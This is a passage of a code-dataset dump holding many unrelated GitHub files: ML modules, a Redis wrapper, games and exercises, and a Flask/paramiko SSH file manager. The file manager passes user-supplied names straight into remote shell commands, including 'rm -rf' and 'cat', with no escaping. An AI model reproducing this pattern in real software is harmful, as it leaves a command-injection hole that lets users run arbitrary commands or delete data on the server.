)\n # Get the corresponding ground truth box only for the proposals with\n # target.\n gt_boxes_idxs = tf.gather(\n overlaps_best_gt_idxs,\n proposals_with_target_idx\n )\n # Get the values of the ground truth boxes.\n proposals_gt_boxes = tf.gather_nd(\n gt_boxes[:, :4], gt_boxes_idxs\n )\n # We create the same array but with the proposals\n proposals_with_target = tf.gather_nd(\n proposals,\n proposals_with_target_idx\n )\n # We create our targets with bbox_transform.\n bbox_targets_nonzero = encode(\n proposals_with_target,\n proposals_gt_boxes,\n variances=self._variances,\n )\n\n # We unmap targets to proposal_labels (containing the length of\n # proposals)\n bbox_targets = tf.scatter_nd(\n indices=proposals_with_target_idx,\n updates=bbox_targets_nonzero,\n shape=tf.cast(tf.shape(proposals), tf.int64)\n )\n\n proposals_label = proposals_label\n bbox_targets = bbox_targets\n\n return proposals_label, bbox_targets\n","repo_name":"tryolabs/luminoth","sub_path":"luminoth/models/fasterrcnn/rcnn_target.py","file_name":"rcnn_target.py","file_ext":"py","file_size_in_byte":12823,"program_lang":"python","lang":"en","doc_type":"code","stars":2397,"dataset":"github-code","pt":"32"} +{"seq_id":"11622656875","text":"\"\"\"\nModule with the aim to train fire CLI library for python\n\nThis is lot a fun :)))\n\"\"\"\n\nimport fire\n\nvictor_dict = {\n \"name\": \"Victor Pereira\",\n \"hobbies\": [\"Programar\", \"assistir harry potter\", \"dormir\"],\n \"age\": 21,\n \"Father\": \"Marcelo Junior\",\n \"Mother\": \"Aparecida Barbosa\"\n}\n\n\ndef say_hello(name: str=\"Baby\") -> str:\n \"\"\"\n A function that says hello given a name,\n if a name hasn't provided you will be called \n as \"Baby\" :)\n \"\"\"\n\n return f\"Hello {name}\"\n\n\nfire.Fire()","repo_name":"Lnvictor/soccer-fire","sub_path":"fire_example.py","file_name":"fire_example.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"71003208410","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('', views.home, name='home'),\n path('todo/addTask', views.addTask, name='addTask'),\n path('todo/markDone//', views.markDone, name='markDone'),\n path('todo/deleteTask//', views.deleteTask, name='deleteTask'),\n path('todo/markUndone//', views.markUndone, name='markUndone'),\n path('todo/editTask//', views.editTask, name='editTask'),\n]","repo_name":"arunkumar02042002/todo_app_django","sub_path":"todos/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":455,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"36733024088","text":"contact_list = [{\"name\":'Ratnavalli', \"number\":913, \"email\":\"ratna@gmail.com\"},{\"name\":\"Pavan\", \"number\":9134983477, \"email\":\"pavan@gmail.com\"},{\"name\":\"Surya\",\"number\":816,\"email\":\"surya@gmail.com\"}]\nnm = input(\"Enter name to get contact: \")\nfor i in contact_list:\n if nm in i.values():\n print(i)\nnum = int(input(\"Enter number to get contact details: \"))\nfor j in contact_list:\n if num in j.values():\n print(j)\nnme = input(\"Enter name to get contact details and edit number: \")\nfor k in contact_list:\n if nme in k.values():\n print(k)\n newnum = int(input(\"Enter number to edit the details of Person: \"))\n k[\"number\"] = newnum\n print(k)","repo_name":"ratnavalli24/Python-Lab","sub_path":"Assignment 2/Source/name.py","file_name":"name.py","file_ext":"py","file_size_in_byte":686,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"30894922288","text":"import logging\nimport time\nimport typing\nfrom datetime import timedelta\n\nfrom django_redis.client import DefaultClient\n\nif typing.TYPE_CHECKING:\n from redis.client import StrictRedis\n\nlogger = logging.getLogger(__name__)\n\n\nclass TwemRedis:\n KEYS = \"twem::cache::keys::set\"\n forever = float(\"+inf\")\n insert_key_commands = (\n \"hset\",\n \"zadd\",\n \"sadd\",\n \"lpush\",\n \"lpushx\",\n \"rpush\",\n \"rpushx\",\n \"lset\",\n \"linsert\",\n \"getset\",\n \"incrby\",\n \"incr\",\n \"incrbyfloat\",\n \"setnx\",\n )\n\n insert_mapping_commands = (\n \"mset\",\n \"msetnx\",\n )\n\n insert_ex_key_commands = (\n \"psetex\",\n \"setex\",\n )\n\n def __init__(self, client: 'StrictRedis'):\n self._client = client\n\n for m in self.insert_key_commands:\n setattr(self, m, self._execute_insert(getattr(client, m)))\n\n for m in self.insert_mapping_commands:\n setattr(self, m, self._execute_insert_mapping(getattr(client, m)))\n\n for m in self.insert_ex_key_commands:\n setattr(self, m, self._execute_insert_ex(getattr(client, m)))\n\n def __getattr__(self, item):\n return getattr(self._client, item)\n\n def _execute_insert(self, fn):\n def wrapper(name, *args, **options):\n result = fn(name, *args, **options)\n if result:\n self._add_keys(name)\n return result\n\n return wrapper\n\n def _execute_insert_ex(self, fn):\n def wrapper(name, ex, *args, **options):\n result = fn(name, ex, *args, **options)\n if result:\n self._add_keys(name, ex=ex.total_seconds() if isinstance(ex, timedelta) else ex)\n return result\n\n return wrapper\n\n def _execute_insert_mapping(self, fn):\n def wrapper(mapping, *args, **options):\n result = fn(mapping, *args, **options)\n if result:\n self._add_keys(*mapping.keys())\n return result\n\n return wrapper\n\n def _add_keys(self, *name, ex: 'float' = None):\n expires = self.forever\n # 总是比 redis 久一点以避免误差\n if ex:\n expires = time.time() + ex\n self._client.zadd(self.KEYS, {i: expires for i in name})\n\n def set(self, name, value, ex=None, px=None, nx=False, xx=False):\n result = self._client.set(name, value, ex, px, nx, xx)\n if result:\n self._add_keys(name, ex=px / 1000 if px else ex or None)\n return result\n\n def delete(self, *names):\n result = self._client.delete(*names)\n if result > 0:\n self._client.zrem(self.KEYS, *names)\n return result\n\n def expire(self, name, ttl):\n result = self._client.expire(name, ttl)\n if result:\n self._client.zadd(self.KEYS, {name: time.time() + ttl})\n return result\n\n def persist(self, name):\n result = self._client.persist(name)\n if result:\n self._client.zadd(self.KEYS, {name: self.forever})\n return result\n\n def house_keeping(self):\n \"\"\"clean cached keys\"\"\"\n client = self._client\n deletes = []\n updates = {}\n for k, ts in client.zscan_iter(self.KEYS, \"*\"):\n ttl = client.ttl(k)\n if ttl == -2: # 不存在\n deletes.append(k)\n elif ttl == -1:\n if ts != self.forever:\n updates[k] = self.forever\n elif ttl == 0:\n deletes = k\n else:\n updates[k] = time.time() + ttl\n\n if updates:\n client.zadd(self.KEYS, updates)\n\n if deletes:\n client.zrem(self.KEYS, *deletes)\n\n def flushdb(self, asynchronous=False):\n self.delete(*self.keys(), self.KEYS)\n\n def flushall(self, asynchronous=False):\n self.delete(*self.keys(), self.KEYS)\n\n def pipeline(self, transaction=True, shard_hint=None):\n return self\n\n def execute(self, raise_on_error=True):\n return []\n\n def scan_iter(self, match=None, count=None):\n now = time.time()\n client = self._client\n for k, ts in client.zscan_iter(self.KEYS, match):\n if ts <= now:\n # 理论上过期\n ttl = client.ttl(k)\n if ttl == -2 or ttl == 0: # 已删除\n client.zrem(self.KEYS, k)\n continue\n else: # 已更新未同步\n client.zadd(self.KEYS, {k: self.forever if ttl == -1 else time.time() + ttl})\n\n if count is not None:\n count -= 1\n yield k\n\n if count == 0:\n break\n\n def keys(self, pattern='*'):\n return list(self.scan_iter(pattern, None))\n\n\nclass Client(DefaultClient):\n def get_client(self, write=True, tried=(), show_index=False):\n parts = super().get_client(write, tried, show_index)\n if show_index:\n return TwemRedis(parts[0]), parts[1]\n return TwemRedis(parts)\n\n def _update(self, key, delta=0, version=None, client: 'StrictRedis' = None):\n client = client or self.get_client()\n key = self.make_key(key, version=version)\n if not client.exists(key):\n raise ValueError(f\"Key '{key}' not found\")\n return client.incr(key, delta)\n\n def incr(self, key, delta=1, version=None, client=None, ignore_key_check=False):\n return self._update(key, delta, version, client)\n\n def decr(self, key, delta=1, version=None, client=None):\n return self._update(key, -delta, version, client)\n","repo_name":"TencentBlueKing/blueking-paas","sub_path":"svc-rabbitmq/svc_rabbitmq/redis.py","file_name":"redis.py","file_ext":"py","file_size_in_byte":5661,"program_lang":"python","lang":"en","doc_type":"code","stars":134,"dataset":"github-code","pt":"32"} +{"seq_id":"12256060239","text":"\"\"\"This program will arrange the remaining timbits in minimum boxes and calculates its cost.\"\"\"\n# we have to find the total cost the timbits we want\n# timbits cost table\n# Number Price\n\n# 1 $0.20\n# 10 (small box) $1.99\n# 20 (medium box) $3.39\n# 40 (large box) $6.19\ntimbits = int(input())\nTOTAL = 0\n\nbig_box = timbits // 40\nTOTAL += big_box*6.19\ntimbits -= 40*big_box\n\nmed_box = timbits // 20\nTOTAL += med_box*3.39\ntimbits -= 20 * med_box\n\nsmall_box = timbits // 10\nTOTAL += small_box * 1.99\ntimbits -= 10 * small_box\n\nTOTAL += timbits*0.20\n\nprint(TOTAL)\n","repo_name":"shubhamrastogi1810/Python_Practicals","sub_path":"cs_circles_answers/design_debug_timbits.py","file_name":"design_debug_timbits.py","file_ext":"py","file_size_in_byte":626,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"73997382171","text":"# Definition for a binary tree node.\nfrom queue import Queue\n\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\nclass CBTInserter:\n\n def __init__(self, root: TreeNode):\n self.root = root\n \n def insert(self, v: int) -> int:\n q = Queue()\n q.put(self.root)\n while(not q.empty()):\n tmpNode = q.get()\n if tmpNode.left != None:\n q.put(tmpNode.left)\n else:\n tmpNode.left = TreeNode(v)\n return tmpNode.val\n if tmpNode.right != None:\n q.put(tmpNode.right)\n else:\n tmpNode.right = TreeNode(v)\n return tmpNode.val\n \n def get_root(self) -> TreeNode:\n return self.root","repo_name":"Leputa/Leetcode","sub_path":"python/919.Complete Binary Tree Inserter.py","file_name":"919.Complete Binary Tree Inserter.py","file_ext":"py","file_size_in_byte":824,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"14687935998","text":"import math\n\nimport numpy as np\nfrom PIL import Image\nfrom torchvision import datasets\nfrom torchvision import transforms\n\nfrom .randaugment import RandAugmentMC\n\n# logger = logging.getLogger(__name__)\n\n\nclass TransformFixMatch(object):\n def __init__(self, mean, std):\n self.weak = transforms.Compose([\n# transforms.ToTensor(),\n transforms.ToPILImage(),\n transforms.RandomHorizontalFlip(), transforms.ToTensor()\n# transforms.RandomCrop(size=224,\n# padding=int(224*0.125),\n# padding_mode='reflect')\n ])\n self.strong = transforms.Compose([\n# transforms.ToTensor(),\n transforms.ToPILImage(),\n transforms.RandomHorizontalFlip(),\n# transforms.RandomCrop(size=224,\n# padding=int(224*0.125),\n# padding_mode='reflect'),\n RandAugmentMC(n=2, m=10), transforms.ToTensor()\n ])\n# self.normalize = transforms.Compose([\n# transforms.ToTensor(), \n# transforms.Normalize(mean=mean, std=std)])\n \n self.clean_transforms = transforms.Compose([\n \n transforms.ToTensor(),\n transforms.ToPILImage(),\n# transforms.Resize((224, 224)),\n transforms.RandomCrop(size=224,\n padding=int(224*0.125),\n padding_mode='reflect'),\n# transforms.RandomResizedCrop(224,\n# scale=(1.00, 1.2),\n# ratio=(0.75, 1.3333333333333333)),\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225])\n ])\n\n def __call__(self, x):\n x = self.clean_transforms(x)\n weak = self.weak(x)\n strong = self.strong(x)\n return weak, strong, x","repo_name":"ranarag/FewShotVQG","sub_path":"FSVQG/utils/fixmatch.py","file_name":"fixmatch.py","file_ext":"py","file_size_in_byte":2053,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"38370150018","text":"import os\r\n\r\nimport pygame\r\n\r\nfrom game_objects.sprite import GenericSprite\r\n\r\nGAME_OVER = 3\r\nBASE_HIT_TIMER = 12\r\n\r\n\r\nclass GenericTile(GenericSprite):\r\n \"\"\"Generic class to represent one tile of the playing field.\"\"\"\r\n\r\n def __init__(self, x, y, img_x, img_y, image_name: str = None):\r\n super().__init__()\r\n\r\n self.x = x\r\n self.y = y\r\n\r\n if image_name is not None:\r\n curdir = os.path.dirname(__file__)\r\n image_path = os.path.join(\r\n curdir, \"..\", \"assets\", \"tiles\", image_name)\r\n self.image = pygame.image.load(image_path)\r\n\r\n self.rect = self.image.get_rect()\r\n self.rect.x = img_x\r\n self.rect.y = img_y\r\n\r\n def scale(self, side_length: int) -> None:\r\n \"\"\"Scales the tile.\r\n\r\n Args:\r\n side_length (int): Wanted side length of tile in pixels.\r\n \"\"\"\r\n self.image = pygame.transform.scale(\r\n self.image, (side_length, side_length))\r\n self.rect = self.image.get_rect()\r\n self.rect.x = self.x*side_length\r\n self.rect.y = self.y*side_length\r\n\r\n def get_pos(self) -> tuple:\r\n \"\"\"Returns the field position of the tile.\r\n\r\n Returns:\r\n pos (tuple): (x, y)\r\n \"\"\"\r\n return (self.x, self.y)\r\n\r\n def get_img_pos(self) -> tuple:\r\n \"\"\"Returns the image position of the tile.\r\n\r\n Returns:\r\n pos (tuple): (x, y)\r\n \"\"\"\r\n return (self.rect.x, self.rect.y)\r\n\r\n\r\nclass PathTile(GenericTile):\r\n \"\"\"A tile on which enemies move.\"\"\"\r\n\r\n def __init__(self, x, y, img_x, img_y):\r\n image_name = \"path.png\"\r\n super().__init__(x, y, img_x, img_y, image_name=image_name)\r\n\r\n\r\nclass BuildableTile(GenericTile):\r\n \"\"\"A tile on which towers can be built.\"\"\"\r\n\r\n def __init__(self, x, y, img_x, img_y):\r\n image_name = \"buildable.png\"\r\n super().__init__(x, y, img_x, img_y, image_name=image_name)\r\n\r\n\r\nclass BaseTile(GenericTile):\r\n \"\"\"A tile which is the base of the player.\"\"\"\r\n\r\n def __init__(self, x, y, img_x, img_y):\r\n super().__init__(x, y, img_x, img_y)\r\n\r\n self.status = {}\r\n self.status[\"health\"] = 100\r\n self.status[\"hit_timer\"] = 0\r\n\r\n images = {\r\n \"normal\": [\"tiles\", \"base.png\"],\r\n \"hit\": [\"tiles\", \"base_hit.png\"]\r\n }\r\n\r\n self.load_images(images)\r\n self.__update_image()\r\n\r\n self.rect = self.image.get_rect()\r\n self.rect.x = img_x\r\n self.rect.y = img_y\r\n\r\n def update(self, damage: int = None) -> None:\r\n \"\"\"Override of the pygame update function.\r\n Use without arguments once per frame to update cooldowns.\r\n\r\n Args:\r\n damage (int): The base takes this amount of damage. (Default value = None)\r\n \"\"\"\r\n if damage is not None:\r\n self.__take_damage(damage)\r\n else:\r\n self.__update_timers()\r\n\r\n self.__update_image()\r\n\r\n def draw(self, surface: pygame.Surface):\r\n \"\"\"Implementation of the pygame draw function.\r\n\r\n Args:\r\n surface (pygame.Surface): The surface on which to draw.\r\n \"\"\"\r\n surface.blit(self.image, self.rect)\r\n\r\n def __take_damage(self, damage: int) -> None:\r\n self.status[\"health\"] -= damage\r\n self.status[\"hit_timer\"] = BASE_HIT_TIMER\r\n\r\n if self.status[\"health\"] <= 0:\r\n pygame.event.post(pygame.event.Event(\r\n pygame.USEREVENT, custom_type=GAME_OVER))\r\n\r\n def __update_timers(self) -> None:\r\n if self.status[\"hit_timer\"] > 0:\r\n self.status[\"hit_timer\"] -= 1\r\n\r\n def __update_image(self) -> None:\r\n if self.status[\"hit_timer\"] > 0:\r\n self.image = self.images[\"hit\"]\r\n else:\r\n self.image = self.images[\"normal\"]\r\n","repo_name":"TemeKoo/ot-harjoitustyo","sub_path":"src/game_objects/tiles.py","file_name":"tiles.py","file_ext":"py","file_size_in_byte":3864,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"18847404994","text":"import paramiko\nfrom flask import session\nimport os\n\nclients = {}\nclient_directory = {}\n\ndef init_client(username, password):\n proxy = None\n client = paramiko.SSHClient()\n client.load_system_host_keys()\n client.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n\n server = \"149.89.161.100\"\n\n client.connect(server, username=username, password=password, sock=proxy)\n\n\n clients[username] = client\n\n ssh_stdin, ssh_stdout, ssh_stderr = clients[username].exec_command(\"pwd\")\n #print(ssh_stdout.readlines()[0][:-1])\n\n client_directory[username] = ssh_stdout.readlines()[0][:-1]\n\n\n\ndef list_files(username):\n\n ssh_stdin, ssh_stdout, ssh_stderr = clients[username].exec_command( f\"cd {client_directory[username]}; ls -p | grep -v /\")\n\n return ssh_stdout.readlines()\n\ndef list_folders(username):\n\n ssh_stdin, ssh_stdout, ssh_stderr = clients[username].exec_command(f\"cd {client_directory[username]}; ls -d */\")\n\n return ssh_stdout.readlines()\n\ndef cat_file(file, username):\n\n ssh_stdin, ssh_stdout, ssh_stderr = clients[username].exec_command(f\"cd {client_directory[username]}; cat {file}\")\n\n return ssh_stdout.readlines()\n\ndef cd(directory, username):\n print(directory)\n\n #when the path is an absolute path (starts with /), then cd to that path\n #otherwise, cd to the current directory and then cd to the path\n new_directory = \"\"\n if directory[0] == \"/\":\n new_directory = directory\n else:\n new_directory = client_directory[username] + \"/\" + directory\n\n print(new_directory)\n ssh_stdin, ssh_stdout, ssh_stderr = clients[username].exec_command(f\"cd {new_directory}; pwd\")\n client_directory[username] = ssh_stdout.readlines()[0][:-1]\n print(client_directory[username])\n\ndef currentPath(username):\n return client_directory[username]\n\ndef rename_file(directory, old, new, username):\n\n ssh_stdin, ssh_stdout, ssh_stderr = clients[username].exec_command(\"mv \" + directory + \"/\" + old + \" \" + directory + \"/\" + new)\n\n return ssh_stdout.readlines()\n\ndef delete_file(filename, username):\n\n ssh_stdin, ssh_stdout, ssh_stderr = clients[username].exec_command(f\"cd {client_directory[username]}; rm {filename}\")\n\n return ssh_stdout.readlines()\n\ndef rename_file(old, new, username):\n\n ssh_stdin, ssh_stdout, ssh_stderr = clients[username].exec_command(f\"cd {client_directory[username]}; mv {old} {new}\")\n\n return ssh_stdout.readlines()\n\ndef create_file(filename, username, content):\n # we use hex to avoid issues with special characters\n ssh_stdin, ssh_stdout, ssh_stderr = clients[username].exec_command(f\"cd {client_directory[username]}; echo '{content}' > temp && xxd -r -p temp > {filename}; rm temp\")\n\n return ssh_stdout.readlines()\n\ndef create_directory(foldername, username):\n\n ssh_stdin, ssh_stdout, ssh_stderr = clients[username].exec_command(f\"cd {client_directory[username]}; mkdir {foldername}\")\n\n return ssh_stdout.readlines()\n\ndef delete_directory(directoryname, username):\n\n ssh_stdin, ssh_stdout, ssh_stderr = clients[username].exec_command(f\"cd {client_directory[username]}; rm -rf {directoryname}\")\n\n return ssh_stdout.readlines()\n\ndef search(filename, username):\n #folders\n ssh_stdin, ssh_stdout_folders, ssh_stderr = clients[username].exec_command(f\"cd {client_directory[username]}; find . -iname '*{filename}*' -type d 2>/dev/null\")\n #files\n ssh_stdin, ssh_stdout_files, ssh_stderr = clients[username].exec_command(f\"cd {client_directory[username]}; find . -iname '*{filename}*' -type f 2>/dev/null\")\n return [ssh_stdout_folders.readlines(), ssh_stdout_files.readlines()]\n\ndef upload(filename, username, content):\n # print(filename)\n # ssh_stdin, ssh_stdout, ssh_stderr = clients[username].exec_command(f\"cd {client_directory[username]}; echo '{content}' > temp && xxd -r -p temp > '{filename}'; rm temp\")\n ftp_client= clients[username].open_sftp()\n localtemp = open(f\"./temp/{filename}\", \"wb\")\n localtemp.write(content)\n localtemp.close()\n\n ftp_client.put(f\"./temp/{filename}\", client_directory[username]+r\"/\"+filename)\n os.remove(f\"./temp/{filename}\")\n ftp_client.close()\n #return ssh_stdout.readlines()\n\ndef download(filename, username):\n ftp_client= clients[username].open_sftp()\n content = \"\"\n try:\n with ftp_client.open(client_directory[username]+r\"/\"+filename) as f:\n content = f.read()\n f.close()\n ftp_client.close()\n except PermissionError:\n ftp_client.close()\n return b\"Permission Denied\"\n return content\n\n\n\ndef get_hex(filename, username):\n ssh_stdin, ssh_stdout, ssh_stderr = clients[username].exec_command(f\"cd {client_directory[username]}; xxd -p {filename}\")\n\n return ssh_stdout.readlines()\n\ndef move_file_to_folder(filename, foldername, username):\n ssh_stdin, ssh_stdout, ssh_stderr = clients[username].exec_command(f\"cd {client_directory[username]}; mv {filename} {foldername}\")\n\n return ssh_stdout.readlines()\n\n","repo_name":"kev1n/jiangjiangwangwang","sub_path":"app/fileman.py","file_name":"fileman.py","file_ext":"py","file_size_in_byte":4987,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"10135097555","text":"\"\"\"\n.. module:: Exp_BOSS\n\nExp_BOSS\n*************\n\n:Description: Exp_BOSS\n\n \n\n:Authors: bejar\n \n\n:Version: \n\n:Created on: 22/02/2017 11:20 \n\n\"\"\"\n\n__author__ = 'bejar'\n\nfrom iWalker.Data import User, Exercise, Exercises, Pacientes, Trajectory\nfrom iWalker.Util.Misc import show_list_signals\nfrom iWalker.Util import Boss, boss_distance, euclidean_distance, bin_hamming_distance, hamming_distance,\\\n cosine_similarity\nfrom sklearn.manifold import MDS, Isomap, TSNE, SpectralEmbedding\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\n\n\nif __name__ == '__main__':\n p = Pacientes()\n e = Exercises()\n p2 = Pacientes()\n e2 = Exercises()\n\n p.from_db(pilot='NOGALES')\n e.from_db(pilot='NOGALES')\n # p2.from_db(pilot='FSL')\n # e2.from_db(pilot='FSL')\n # e2.delete_patients(['FSL30'])\n #\n # e.merge(e2)\n\n e.delete_exercises([1425290750])\n # e.delete_exercises([1416241920, 1416241871, 1416409354, 1416391685, 1416933676, 1416918342, 1416391884, 1416391948])\n wlen = 128\n voclen = 3\n ncoefs = 5\n\n nseries = 0\n lcl = []\n\n print(len(e.edict))\n for ex in e.iterator():\n t = Trajectory(ex.get_coordinates())\n if t.straightness()[0] < 0.9:\n e.delete_exercises([ex.id])\n print(len(e.edict))\n\n\n\n for ex in e.iterator():\n forces = ex.get_forces()\n if forces.shape[0] > wlen:\n nseries += 1\n if 'FSL' in ex.uid:\n lcl.append('r')\n else:\n lcl.append('g')\n else:\n e.delete_exercises([ex.id])\n print(len(e.edict))\n\n mdist = np.zeros((nseries, nseries))\n print(nseries)\n\n for f in range(6):\n dseries = {}\n for ex in e.iterator():\n forces = ex.get_forces()\n if forces.shape[0] > wlen:\n dseries[str(ex.uid) + '#' + str(ex.id)] = forces[:, f]\n\n boss = Boss(dseries, 10, butfirst=True)\n boss.discretization_intervals(ncoefs, wlen, voclen)\n boss.discretize()\n lcodes = list(boss.codes.keys())\n\n for i in range(len(lcodes)):\n for j in range(i+1, len(lcodes)):\n # mdist[i,j] += bin_hamming_distance(boss.codes[lcodes[i]], boss.codes[lcodes[j]])\n # mdist[i,j] += euclidean_distance(boss.codes[lcodes[i]], boss.codes[lcodes[j]])\n mdist[i,j] += cosine_similarity(boss.codes[lcodes[i]], boss.codes[lcodes[j]])\n mdist[j, i] = mdist[i,j]\n # mdist[i,j] += (boss_distance(boss.codes[v1], boss.codes[v2]) + boss_distance(boss.codes[v2], boss.codes[v1]))/2\n\n # lej = []\n # for i, ex in enumerate(boss.codes.keys()):\n # lej.append((np.mean(mdist[i,:]), ex))\n #\n # for d, e in sorted(lej):\n # print(e,d)\n\n mdist /= np.max(mdist)\n\n # transf = MDS(n_components=100, dissimilarity='precomputed', n_jobs=-1, random_state=0)\n # fdata = transf.fit_transform(mdist)\n # print(transf.stress_)\n\n for nn in range(1, 2, 2):\n print(nn)\n fdata = mdist\n # imap = Isomap(n_components=3, n_neighbors=nn, n_jobs=-1)\n imap = SpectralEmbedding(n_components=2, affinity='precomputed', n_neighbors=nn)\n fdata = imap.fit_transform(fdata)\n\n fig = plt.figure(figsize=(10,10))\n # ax = fig.add_subplot(111, projection='3d')\n ax = fig.add_subplot(111)\n\n # plt.scatter(fdata[:, 0], fdata[:, 1], zs=fdata[:, 2], depthshade=False, s=100)\n plt.scatter(fdata[:, 0], fdata[:, 1], c=lcl)\n\n plt.show()\n","repo_name":"ogmaribel/masterthesis","sub_path":"Experiments/Exp_BOSS.py","file_name":"Exp_BOSS.py","file_ext":"py","file_size_in_byte":3558,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"35022337419","text":"import csv\n\ndef main():\n with open('draft_1980_1993.csv', 'w') as f:\n writer = csv.writer(f)\n writer.writerow([\"Year\",\"Rnd\",\"Pick\",\"Tm\",\"Player\",\"Pos\",\"Age\",\"To\",\"St\",\"CarAV\",\"DrAV\",\"G\"])\n for year in range(1980, 1994):\n with open('draft_' + str(year) + '.csv', 'r') as g:\n reader = csv.reader(g)\n for line in reader:\n if (len(line[3].split(\"\\\\\")) > 1):\n line[3] = line[3].split(\"\\\\\")[0]\n line = [x.replace(' HOF', '') for x in line]\n writer.writerow([year] + line)\n\nif __name__ == '__main__':\n main()\n","repo_name":"kevinli96/NFL-Player-Valuation","sub_path":"data/draft_data_by_year/draft_loader.py","file_name":"draft_loader.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"43010281575","text":"n, m = map(int, input().split())\n\ns = []\n\ndef f():\n if len(s) == m:\n print(' '.join(map(str, s)))\n return\n\n for i in range(1, n + 1):\n if i in s: #이미 들어가있는 같은 수는 배제 \n continue\n s.append(i)\n f()\n s.pop()\n\nf()","repo_name":"ChoiBeomJun99/BaekJoonStudy","sub_path":"15649.py","file_name":"15649.py","file_ext":"py","file_size_in_byte":258,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"39662200052","text":"# Connect 4 is a game where opponents take turns dropping red or black discs\r\n# into a 7 x 6 vertically suspended grid. The game ends either when one player\r\n# creates a line of four consecutive discs of their color (horizontally,\r\n# vertically, or diagonally), or when there are no more spots left in the grid.\r\n\r\n\r\nfrom enum import Enum\r\nfrom random import randint\r\n\r\n\r\nclass Disc(Enum):\r\n RED = 0\r\n BLACK = 1\r\n\r\n\r\nclass Connect4:\r\n def __init__(self):\r\n self.nrow = 7\r\n self.ncol = 6\r\n self.grid = [[None for i in range(self.ncol)]\r\n for j in range(self.nrow)]\r\n self.winner = None\r\n self.discs = (\"⦾\", \"◼\")\r\n\r\n def reset(self):\r\n self.grid = [[None for i in range(self.ncol)]\r\n for j in range(self.nrow)]\r\n self.winner = None\r\n\r\n def continue4(self, x, y):\r\n length = min(len(x), len(y))\r\n if length < 4:\r\n return False\r\n\r\n count = 0\r\n pre = self.grid[x[0]][y[0]]\r\n for i in range(1, min(len(x), len(y))):\r\n cur = self.grid[x[i]][y[i]]\r\n if cur and cur == pre:\r\n count = 2 if count == 0 else count + 1\r\n else:\r\n count = 0\r\n if count >= 4:\r\n self.winner = cur\r\n return True\r\n pre = cur\r\n return False\r\n\r\n def is_full(self):\r\n for i in range(self.nrow):\r\n for j in range(self.ncol):\r\n if self.grid[i][j] is None:\r\n return False\r\n return True\r\n\r\n def is_over(self):\r\n if self.is_full():\r\n return True\r\n\r\n horizontally = any([self.continue4(\r\n [x for i in range(self.ncol)], [j for j in range(self.ncol)])\r\n for x in range(self.nrow)])\r\n if horizontally:\r\n return True\r\n\r\n vertically = any([self.continue4(\r\n [i for i in range(self.nrow)], [y for j in range(self.nrow)])\r\n for y in range(self.ncol)])\r\n if vertically:\r\n return True\r\n\r\n diagonally = any([self.continue4(\r\n [i for i in range(self.nrow)], [j for j in range(start, self.ncol)]\r\n ) for start in range(self.ncol)] + [self.continue4(\r\n [i for i in range(start, self.nrow)], [j for j in range(self.ncol)]\r\n ) for start in range(self.nrow)] + [self.continue4(\r\n [i for i in range(self.nrow)], [j for j in range(start, -1, -1)]\r\n ) for start in range(self.ncol - 1, -1, -1)] + [self.continue4(\r\n [i for i in range(start, self.nrow)], [\r\n j for j in range(self.ncol - 1, -1, -1)]\r\n ) for start in range(self.nrow)]\r\n )\r\n if diagonally:\r\n return True\r\n\r\n return False\r\n\r\n def display(self):\r\n print(\"-\" * 13)\r\n for row in self.grid:\r\n print(\r\n \" \".join([\"{}\" for _ in range(6)]).format(\r\n *[\r\n self.discs[row[i].value] if row[i] is not None else \"◻\"\r\n for i in range(6)\r\n ]\r\n ),\r\n end=\" |\\n\",\r\n )\r\n print(\"-\" * 13)\r\n\r\n def put(self, i, j, disc=0):\r\n if 0 <= i < 7 and 0 <= j < 6:\r\n if self.grid[i][j] is None:\r\n if disc == 0 or disc == 1:\r\n self.grid[i][j] = Disc.RED if disc == 0 else Disc.BLACK\r\n return True\r\n return False\r\n\r\n\r\nif __name__ == \"__main__\":\r\n c4 = Connect4()\r\n step = 0\r\n while not c4.is_over():\r\n while not c4.put(randint(0, 6), randint(0, 5), step & 1):\r\n continue\r\n\r\n c4.display()\r\n step += 1\r\n\r\n if c4.winner:\r\n print('Winner is {}'.format(c4.winner))\r\n else:\r\n print('Draw.')\r\n","repo_name":"kemingy/daily-coding-problem","sub_path":"src/connect4.py","file_name":"connect4.py","file_ext":"py","file_size_in_byte":3852,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"14118694341","text":"import sys\nimport os\nimport time\nimport copy\nimport yaml\nsys.path.append(os.path.dirname(os.path.dirname(__file__)))\nfrom physical_env.network.NetworkIO import NetworkIO\nfrom physical_env.mc.MobileCharger import MobileCharger\n\ndef log(net, mcs):\n # If you want to print something, just put it here. Do not revise the core code.\n while True:\n print(net.env.now, net.listNodes[0].energy)\n yield net.env.timeout(1.0)\n\nnetIO = NetworkIO(\"physical_env/network/network_scenarios/hanoi1000n50.yaml\")\nenv, net = netIO.makeNetwork()\n\nwith open(\"physical_env/mc/mc_types/default.yaml\", 'r') as file:\n mc_argc = yaml.safe_load(file)\nmcs = 